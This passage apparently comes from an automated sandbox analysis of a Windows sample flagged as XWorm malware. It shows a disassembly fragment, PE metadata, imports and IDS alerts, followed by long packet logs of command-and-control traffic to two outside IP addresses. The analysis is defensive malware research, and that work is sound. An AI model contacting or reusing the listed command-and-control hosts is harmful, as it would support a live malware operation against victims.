                mov dword ptr [esi+04h], eax
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                mov edi, edi
                push ebp
                mov ebp, esp
                sub esp, 10h
                mov eax, dword ptr [0041F920h]
                xor eax, ebp
                mov dword ptr [ebp-04h], eax
                mov edx, dword ptr [ebp+18h]
                push ebx
                Programming Language:
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [IMP] VS2008 SP1 build 30729
                • [C++] VS2010 build 30319
                • [RES] VS2010 build 30319
                • [LNK] VS2010 build 30319
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1d95c0x3c.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x1c748.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x400000x138c.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1c3680x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x190000x150.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x175480x176002832193bc838d3749cda385130dee996False0.5840261530748663data6.643994573279363IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0x190000x50e00x52002b632e407db410004511f129777602b4False0.3598513719512195data4.9252502906591396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x1f0000x37c40x1a00268250434fbffdf0a4bf9cf4a64d29c5False0.3167067307692308data3.867957401461582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x230000x1c7480x1c80013c7e8b4f8049f0b57e98c87b62e9647False0.2745768229166667data4.800930470827677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x400000x1e2c0x2000061df8fc06366d9ad70b17618c2ca63bFalse0.482666015625data4.816108713673021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x233a00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152ChineseChina0.2554878048780488
                RT_ICON0x23a080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512ChineseChina0.3602150537634409
                RT_ICON0x23cf00x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288ChineseChina0.39344262295081966
                RT_ICON0x23ed80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128ChineseChina0.4358108108108108
                RT_ICON0x240000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsChineseChina0.4986673773987207
                RT_ICON0x24ea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsChineseChina0.5888989169675091
                RT_ICON0x257500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsChineseChina0.548963133640553
                RT_ICON0x25e180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsChineseChina0.40534682080924855
                RT_ICON0x263800x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.18236129184904767
                RT_ICON0x36ba80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.3425838450637695
                RT_ICON0x3add00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.3924273858921162
                RT_ICON0x3d3780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.49953095684803
                RT_ICON0x3e4200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.580327868852459
                RT_ICON0x3eda80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.6906028368794326
                RT_GROUP_ICON0x3f2100xcadataChineseChina0.6089108910891089
                RT_VERSION0x3f2dc0x304dataChineseChina0.43134715025906734
                RT_MANIFEST0x3f5e00x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                DLLImport
                KERNEL32.dllCloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap
                WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA
                Language of compilation systemCountry where language is spokenMap
                ChineseChina
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/02/24-19:27:48.531831TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M270004970859.56.110.103192.168.2.10
                07/02/24-19:28:02.641410TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497087000192.168.2.1059.56.110.103
                07/02/24-19:26:31.035751TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497087000192.168.2.1059.56.110.103
                07/02/24-19:25:03.851820TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497087000192.168.2.1059.56.110.103
                07/02/24-19:28:02.635547TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes70004970859.56.110.103192.168.2.10
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 19:24:45.026818037 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.031827927 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.031934977 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.032059908 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.036792040 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979119062 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979178905 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979186058 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979269981 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.979298115 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.979443073 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979449987 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979460955 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979470015 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979518890 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.979518890 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.979882002 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979888916 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979895115 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.979955912 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:45.984069109 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.984087944 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:45.984224081 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.216850042 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.216912985 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.216967106 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217000008 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.217034101 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.217034101 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.217108011 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217116117 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217164993 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.217288017 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217390060 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.217854977 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217860937 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217873096 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.217978001 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.218102932 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218230009 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.218240023 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218245983 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218308926 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.218436956 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218488932 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.218550920 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218558073 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218569040 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218575954 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218601942 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.218635082 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.218991041 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.218998909 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.219053984 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.219441891 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.219516993 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.219520092 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.219527006 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.219573975 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.221932888 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.222018003 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.222088099 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.222161055 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.222167015 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.222173929 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.222218990 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.222218990 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.454722881 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.454783916 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.454791069 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.454844952 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.454844952 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.455092907 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455102921 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455115080 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455121994 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455185890 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.455446959 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455454111 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455460072 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455503941 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.455527067 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.455765009 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455770969 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455784082 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.455826998 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.456182957 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456188917 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456195116 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456201077 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456212997 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456219912 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456224918 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456240892 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.456240892 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.456262112 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.456290960 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.456994057 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.457000017 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.457012892 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.457060099 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.457060099 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:46.548846006 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:24:46.548969030 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:24:50.512407064 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:24:50.517437935 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:24:50.517569065 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:24:50.770144939 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:24:50.911608934 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:03.851819992 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:03.856626987 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:04.185338974 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:04.238194942 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:04.514658928 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:04.519702911 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:16.926495075 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:16.932051897 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:17.262506962 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:17.265055895 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:17.269995928 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:18.491913080 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:18.535146952 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:30.004367113 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:30.009336948 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:30.339859962 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:30.343574047 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:30.348565102 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:43.082802057 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:43.087631941 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:43.416511059 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:43.425026894 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:43.429888964 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:48.494132996 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:48.535218954 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:51.458343029 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:25:51.458450079 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:25:53.395464897 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:53.628973007 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:53.642569065 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:53.642595053 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:53.973797083 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:53.977257013 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:53.982192993 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:54.270006895 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:54.274880886 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:54.603859901 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:54.619333982 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:54.624145031 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:54.941957951 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:54.947242975 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.035686970 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:55.040543079 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.239356041 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:55.244496107 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.275682926 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.285409927 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:55.334037066 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.517119884 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.519125938 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:55.524116039 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.796210051 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:55.801194906 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:55.805977106 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:56.754271030 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:56.759324074 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:57.087941885 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:25:57.089941025 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:25:57.094856024 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:04.942106962 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:04.947887897 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:05.082530975 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:05.087430954 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:05.276668072 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:05.280270100 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:05.286572933 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:05.524923086 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:05.530759096 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:05.535940886 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.332664967 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:10.337512970 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.426253080 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:10.431102037 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.441837072 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:10.446621895 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.473146915 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:10.477962017 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.666465044 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.669002056 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:10.673846960 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.906523943 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:10.916600943 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:10.921535015 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:11.159605026 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:11.170754910 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:11.175685883 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:11.177151918 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:11.182199955 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:11.411134005 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:11.416021109 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:11.973893881 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:11.975536108 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:11.980379105 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:14.019992113 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:14.025361061 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:14.354161024 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:14.356132030 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:14.360889912 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:15.551229954 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:15.578768969 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:15.907475948 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:15.909339905 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:15.914211988 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:17.535559893 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:17.542098999 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:17.870080948 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:17.872157097 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:17.877017021 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:18.521421909 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:18.566567898 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:30.613755941 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:30.732541084 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:30.973040104 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:30.978003025 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.035751104 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:31.040673018 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.058919907 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.065179110 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:31.113900900 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.113980055 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:31.118959904 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.306619883 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.308701992 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:31.313999891 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.546469927 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.549139977 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:31.554117918 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.786165953 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:31.788052082 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:31.794362068 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:32.082675934 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:32.087476015 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:32.604402065 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:32.606688023 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:32.611469984 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:34.519814014 CEST49707881192.168.2.1091.208.240.157
                Jul 2, 2024 19:26:34.524849892 CEST8814970791.208.240.157192.168.2.10
                Jul 2, 2024 19:26:37.332468033 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:37.544912100 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:37.875310898 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:37.877321959 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:37.882138968 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:44.535512924 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:44.541017056 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:44.869843960 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:44.871345043 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:44.876185894 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:46.380490065 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:46.385560989 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:46.442600965 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:46.448615074 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:46.756450891 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:46.759774923 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:46.767992020 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:46.996155977 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:46.998090029 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:47.004132032 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:48.517290115 CEST70004970859.56.110.103192.168.2.10
                Jul 2, 2024 19:26:48.566519976 CEST497087000192.168.2.1059.56.110.103
                Jul 2, 2024 19:26:49.473284960 CEST497087000192.168.2.1059.56.110.103
